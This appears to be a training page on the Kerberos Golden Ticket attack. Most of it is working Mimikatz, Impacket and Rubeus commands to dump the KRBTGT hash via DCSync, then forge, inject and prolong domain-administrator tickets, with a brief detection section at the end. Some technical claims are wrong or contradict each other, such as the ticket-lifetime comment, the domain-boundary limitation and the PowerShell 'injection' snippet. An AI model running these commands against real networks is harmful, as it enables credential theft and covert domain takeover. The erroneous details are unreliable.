Golden Ticket Attack
Master the most powerful Kerberos attack for domain persistence.
Objectives
- Understand Golden Ticket attack methodology
- Learn KRBTGT hash extraction techniques
- Master Golden Ticket creation and injection
- Implement domain-wide persistence
What is a Golden Ticket?
A Golden Ticket is a forged Ticket Granting Ticket (TGT) that allows an attacker to impersonate any user in the domain, including domain administrators.
Golden Ticket Characteristics:
- Domain-wide access: Can access any resource in the domain
- Long-term persistence: Valid until the ticket expires
- User impersonation: Can impersonate any user account
- Bypasses authentication: No need for valid credentials
Prerequisites for Golden Ticket Attack
To create a Golden Ticket, an attacker needs:
1. KRBTGT Account Hash
The KRBTGT account hash is the master key used to encrypt and sign all TGTs in the domain.
Extraction Methods:
- DCSync Attack: Replicate password data from Domain Controller
- LSASS Memory: Extract from Domain Controller memory
- NTDS.dit: Extract from Active Directory database
- Volume Shadow Copy: Backup extraction techniques
2. Domain SID
The Domain Security Identifier is required to create valid SIDs for the forged ticket.
# Get Domain SID using PowerShell
Get-ADDomain | Select-Object DomainSID
# Alternative method
wmic useraccount where name="krbtgt" get sid
3. Domain Name
The fully qualified domain name (FQDN) is required for ticket creation.
Golden Ticket Creation Process
Step 1: KRBTGT Hash Extraction
Extract the KRBTGT account hash using DCSync attack:
# Using Mimikatz
mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt
# Using Impacket
secretsdump.py -dc-ip 192.168.1.10 corp.local/compromised_user:password@192.168.1.10
# Using Rubeus
Rubeus.exe dcsync /user:krbtgt /domain:corp.local
Step 2: Golden Ticket Creation
Create the Golden Ticket using the extracted hash:
# Using Mimikatz
mimikatz # kerberos::golden /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:aad3b435b51404eeaad3b435b51404ee:1234567890abcdef1234567890abcdef /user:administrator /id:500 /groups:512,513,518,519,520
# Using Rubeus
Rubeus.exe golden /rc4:aad3b435b51404eeaad3b435b51404ee:1234567890abcdef1234567890abcdef /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /user:administrator /groups:512,513,518,519,520
Step 3: Ticket Injection
Inject the Golden Ticket into memory:
# Using Mimikatz
mimikatz # kerberos::ptt ticket.kirbi
# Using Rubeus
Rubeus.exe ptt /ticket:ticket.kirbi
# Using PowerShell
Add-Type -AssemblyName System.IdentityModel
[System.IdentityModel.Tokens.KerberosRequestorSecurityToken]::new("service/corp.local")
Advanced Golden Ticket Techniques
1. Custom PAC Creation
Create Golden Tickets with custom PAC data for specific access:
# Create Golden Ticket with custom groups
mimikatz # kerberos::golden /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:hash /user:serviceaccount /id:1001 /groups:512 /sids:S-1-5-21-1234567890-1234567890-1234567890-519 /ticket:serviceaccount.kirbi
2. Cross-Domain Golden Tickets
Create Golden Tickets for trusted domains:
# Create Golden Ticket for trusted domain
mimikatz # kerberos::golden /domain:trusted.local /sid:S-1-5-21-0987654321-0987654321-0987654321 /krbtgt:trusted_hash /user:administrator /ticket:trusted_golden.kirbi
3. Long-term Persistence
Create Golden Tickets with extended lifetimes:
# Golden Ticket valid for 10 years
mimikatz # kerberos::golden /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:hash /user:administrator /startoffset:0 /endin:525600 /renewmax:525600
Golden Ticket Detection
Detecting Golden Ticket attacks requires monitoring specific events and behaviors.
Detection Indicators
- Event ID 4769: Kerberos service ticket was requested
- Event ID 4770: Kerberos service ticket was renewed
- Event ID 4771: Kerberos pre-authentication failed
- Unusual authentication patterns: Logins from unexpected locations
- Ticket lifetimes: Unusually long ticket lifetimes
Monitoring Commands
# Monitor for Golden Ticket indicators
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4769} | Where-Object {$_.Message -match "krbtgt"}
# Check for unusual ticket lifetimes
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4769} | Where-Object {$_.Message -match "Lifetime"}
Golden Ticket Limitations
Understanding the limitations helps in both attack and defense scenarios.
Technical Limitations
- Domain boundary: Only works within the same domain
- KRBTGT rotation: Invalidated when KRBTGT password changes
- PAC validation: Some services validate PAC integrity
- Encryption types: Limited by supported encryption types
Operational Limitations
- Detection risk: Can be detected through monitoring
- Forensic evidence: Leaves traces in logs
- Network requirements: Requires network connectivity to DC
- Service dependencies: Some services may not accept forged tickets